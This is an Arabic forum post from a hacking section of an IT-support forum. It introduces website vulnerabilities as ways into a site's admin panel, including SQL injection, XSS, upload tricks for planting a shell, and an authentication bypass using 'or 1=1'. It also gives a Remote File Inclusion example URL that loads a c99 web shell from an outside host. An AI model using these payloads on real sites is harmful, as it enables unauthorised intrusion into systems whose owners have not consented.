منتـديات الدعـم و تقنيـة المعلـومـات
منتـديات الدعـم و تقنيـة المعلـومـات

منتـديات الدعـم و تقنيـة المعلـومـات
 
الرئيسيةالرئيسية  البوابةالبوابة  اليوميةاليومية  الأحداثالأحداث  المنشوراتالمنشورات  س .و .جس .و .ج  بحـثبحـث  التسجيلالتسجيل  دخولدخول  
بحـث
 
 

نتائج البحث
 
Rechercher بحث متقدم
المواضيع الأخيرة
» *(قالت احبك قلت صفي طابور )*
السبت سبتمبر 29, 2018 3:59 am من طرف support service

» أنا يابحر ماجيتك فضى ولمشاهـدك شفقـان
السبت سبتمبر 29, 2018 3:58 am من طرف support service

» الأمن الإلكتروني اختراق وتسريب بيانات ربع سكان سنغافورة ورئيس وزرائها
السبت سبتمبر 22, 2018 10:47 am من طرف support service

» الأمن الإلكتروني أنشطة البوت نت في النصف الأول من 2018 .. زيادة في انتشار البوتات متعددة الوظائف
السبت سبتمبر 22, 2018 10:46 am من طرف support service

» الأمن الإلكتروني مجموعة LuckyMouse التخريبية تعود بشهادة مشروعة للمصادقة على البرمجيات الخبيثة
السبت سبتمبر 22, 2018 10:44 am من طرف support service

» #عاجل .. الاحتلال يعترف بتدمير العديد من مواقعه بفعل هجمات هكرز مركزة ... وينشر قائمة لمواقع تم اختراقها ..
السبت سبتمبر 22, 2018 10:43 am من طرف support service

»  برنامج حماية وتشفير للملفات
السبت سبتمبر 22, 2018 10:39 am من طرف support service

» مسلسل ايام الدراسة الجزء الثاني الحلقة 32 كاملة
السبت سبتمبر 22, 2018 3:43 am من طرف support service

» مسلسل ايام الدراسة الجزء الثاني الحلقة 9 كاملة
السبت سبتمبر 22, 2018 3:42 am من طرف support service

ازرار التصفُّح
 البوابة
 الرئيسية
 قائمة الاعضاء
 البيانات الشخصية
 س .و .ج
 بحـث
ازرار التصفُّح
 البوابة
 الرئيسية
 قائمة الاعضاء
 البيانات الشخصية
 س .و .ج
 بحـث
ازرار التصفُّح
 البوابة
 الرئيسية
 قائمة الاعضاء
 البيانات الشخصية
 س .و .ج
 بحـث
المواضيع الأكثر نشاطاً
تحداك تعد الى العشره من غير محد يقاطعك
ما رأيك بقيادة المرأة
ودعتك وقلبي معاك ..
صور وعبارات ترحيبيه
يقال عندنا في العامية .متجدد

شاطر | 
 

 ما هى الثغره؟ او الثغرات

اذهب الى الأسفل 
كاتب الموضوعرسالة
support service
Admin
Admin
avatar

عدد المساهمات : 132
السٌّمعَة : 0
تاريخ التسجيل : 03/06/2011

مُساهمةموضوع: ما هى الثغره؟ او الثغرات   الإثنين مايو 08, 2017 2:09 am


ما هى الثغره؟
هو خطأ برمجى يقع به المبرمج يمكننا من خلاله الوصول الى لوحة تحكم الموقع

كيف يتم استغلال الثغره ؟ في الدرس القادم ستعلم كيف عمل ذلك

كيفية البحث عن الثغره ؟ للبحث عن الثغرات تستطيع البحث يدويا او عن طريق مواقع ما وطرق البحث سهله جدا جدا



انواع الثغرات او بعض انواعها

لا اخفي عليكم متابعينى الكرام ان الثغرات كثيره ولن نعيد الكلام عن ثغرة اسكول فزاد الكلام عنها واظن الجميع قد شرحها وهو عن طريق الحقن

ولكن ارجو الانتباه ان 33% من المواقع مصابه بهذه الثغره

فلذلك سأعيد الكلام عنها ولكن بنقاط مختلفه .. هذه الثغره سهل استخدامها جدا وناجحه جدا ولكنها مقرفه بعض الشيء وهى بسبب الحقن وقد يدوم الحقن من 5 ال 10 ساعات او اكثر -_-

بس لازم نتعلم طرق استغلالها

والشرح القادم سأقدم ذلك



ومن انواع هذه الثغرات ما يأتى :



1_ ثغرة XXS بهذه الثغره تستطيع عمل الكثير للوصول الى لوحة تحكم الموقع

وبهذا الكود ’zer0o0-hacker’)

تستطيع معرفة ان كانت الثغره تعمل داخل الموقع ام لا

وسنأتى بالشرح عنها قريبا

...................................................................................

2_ ثغرات الرفع :::: Remote File Uploed

هذه الثغرات تمكننا من رفع ملف على الموقع كثغرات مراكز التحميل

ولكن لا تعمل مع جميع مواقع التحميل وهى عن طريق رفع الشيل الخاص بك وعليك بخداع الموقع وتغيير الامتداد والحديث عنها كثير وناجحه بعض الشيء

وسيأتى الكلام عنها ان كان يوجد وقت

............................................................................................

3_ ثغرة -Remote File Inclusion | ثغرات فايل انكلود.

وهذه من افضل الثغرات من وجهة نظرى ومن مميزاتها انك تستطيع استغلال الثغره دون الانتظار لرفع الشيل والوصول الى ما تريد عن طريق اوامر لينكس مباشرة

مثال

http://www.site.com/qtronix.php?fox=http://www.sh3ll.org/c99.txt?
نشرحها.
www.site.com: موقع الضحية
qtronix.php?: اسم الملف المصاب بالثغرة.
fox=: المتغيير المصاب والذي سيتم وضع رابط الشل الي بامتداد txt عليه.
http://www.sh3ll.org/c99.txt?: هذا هو رابط الشل الي بامتداد txt, ويجب وضع علامة السؤال [؟] في نهاية رابط الشل لكى يستعرض معك الشل ..

...........................................................................

4_ ثغرة : bypass admin control panal
هذه الثغرات تسمح لنا بتجاوز لوحة التحكم control panal الخاصه بأدمن الموقع . اي تخطي صفحة طلب الباسبورد والاسم المرخص لهم بدخول لوحة تحكم .:.
طريقة {{{{{ or 1=1}}}}}}}}}}} حسب الرموز التي تدخلها والرموز كثيرة جدا .:. او عن طريقة الدخول على اي ملف من ملفات المجلد من خلال السكربت



واخيرا وليس اخيرا فالثغرات كثيره جدا وطرق استغلالها اكثر
الرجوع الى أعلى الصفحة اذهب الى الأسفل
https://www.support7service.com/
 
ما هى الثغره؟ او الثغرات
الرجوع الى أعلى الصفحة 
صفحة 1 من اصل 1

صلاحيات هذا المنتدى:لاتستطيع الرد على المواضيع في هذا المنتدى
منتـديات الدعـم و تقنيـة المعلـومـات :: منتـــدى الـتـقـنـيـات الـحـديـثـة :: قـســم الهكـــرز والثغـــرات-
انتقل الى: